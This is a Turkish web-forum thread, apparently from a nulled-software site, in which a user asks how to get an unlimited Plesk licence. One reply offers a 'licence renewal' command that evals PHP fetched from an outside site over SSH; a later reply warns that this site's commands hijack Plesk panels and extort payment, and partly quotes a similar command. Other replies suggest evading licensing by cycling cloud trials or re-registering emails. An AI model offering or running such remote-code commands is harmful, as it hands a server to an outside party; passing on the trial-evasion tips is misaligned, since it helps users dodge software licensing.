Çözüldü Plesk Panel Sınırsız Lisans Hk.

cronos86

Front end Developer
Null Starter
Awards
1
NullCash
3,100
LV
0

Merhaba arkadaşlar plesk panel kullanıyorum sunucumda bugun lisans trial kurdum normalde sınırlama uyarısı almıyordum bugun yaptığım lisans eklemede trial 3 domain sınırı verdı sizin sisteminizde 4 domain var diyor normalde demiyordu bunu :) bir sorum olacaktı bu konuda sınırsız lisans varmı piyasada yada sınırsız lisans yapabilirmiyiz plesk panelde sınırlama getirmeye başladı sanırım lisans olaylarına Cpanel turkıye ıcın bılıyosunuz seçenekleri kaldırdı tr olarak

hepinize teşekkür ederim ilgi ve lakanızdan dolayı 🤗

La Câlin

Dengemde Yok, Dengimde.
Administrator
Awards
3
NullCash
14,292
LV
1

Ben cpanel dışı önermiyorum

cronos86

Front end Developer
Null Starter
Awards
1
NullCash
3,100
LV
0

bende cpanel pahalı oldu aylıkları dıye plesk geçmiştim hocam :( kötü yapmışım ozaman

La Câlin

Dengemde Yok, Dengimde.
Administrator
Awards
3
NullCash
14,292
LV
1

Varda siteleri bakımda sanırım özel olarak teklif alman gerekebilir

Enez

Bilg. Müh. Öğrenci
NullVips Usta
Awards
1
NullCash
3,124
LV
0

directadmin de iyi aslında cpanele göre daha uygun

NicoLord

Yeni Üye
Awards
1
NullCash
60
LV
0

Uyarı: içeriği görüntüleyebilmek için   Giriş yap veya   Kayıt ol
isterseniz lisans yenileme kodu iletebilirim. Sunucu eger ise ait is ssh ile baglanarak bu komutu calistirin. ben kendi sunucumda kullanmaktayım.
plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));"
Plesk konteol sagladigindan haftada bir kontrol edin eger lisans bitmisse ayni komutu tekrar calistirin.

sinanmavi

NullVips Usta
Awards
1
NullCash
1,268
LV
0

Arkadaşlar ossav.com un hiçbir komutunu kullanmayın. Pleskinizi tamamen rehin alıp istediği gibi reklam dosyalarını yüklüyor ve plesk paneliniz artık onların elinde olup düzelmiyor. Ardından o reklamların kaldırılması için size bizden lisans alın diyor. Lisans almazsanız hem reklam kalıyor hemde kısıtlı plesk oluyor.

Tavsiye komu

plesk php -r "eval('?>'.file_get_contents('
"

canersalmanx

Yeni Üye
Awards
1
NullCash
833
LV
0

Eğer free takılmak istiyorsan amazon aws öneririm cpanel kurarsın 15 gün trial lisans kullanırsın her 15 günde bir amazon da cpanel yedeklerini aldıktan sonra makineyi siler tekrar kurulum yaparsın farklı ip vereceği için 15 günde bir bu şekilde devam edebilirsin amazon aws - digital - azure - kametera gibi bir sürü böyle web siteleri var free takılmak istiyorsan bu şekilde sana bir öneride bulunabilirim.

İyi forumlar dilerim.

sinanmavi

NullVips Usta
Awards
1
NullCash
1,268
LV
0

Konuyu sen farklı algıladın sanırım biz pleskten bahsediyoruz birde elinde var olan vds yada serverdan bahsediyoruz. sıfırdan gidip almaktan veya cpanelden değil kardeşim. Yinede açıklaman için sağol.

barisaselozdemir

Yeni Üye
NullCash
68
LV
0

SSH scriptlerine pek bakma bence yeni mail ile plesk in sitesinden kayıt oluştur maile trial keyi gönderiyor onu girerek kullanmaya devamet

DMCA compliant image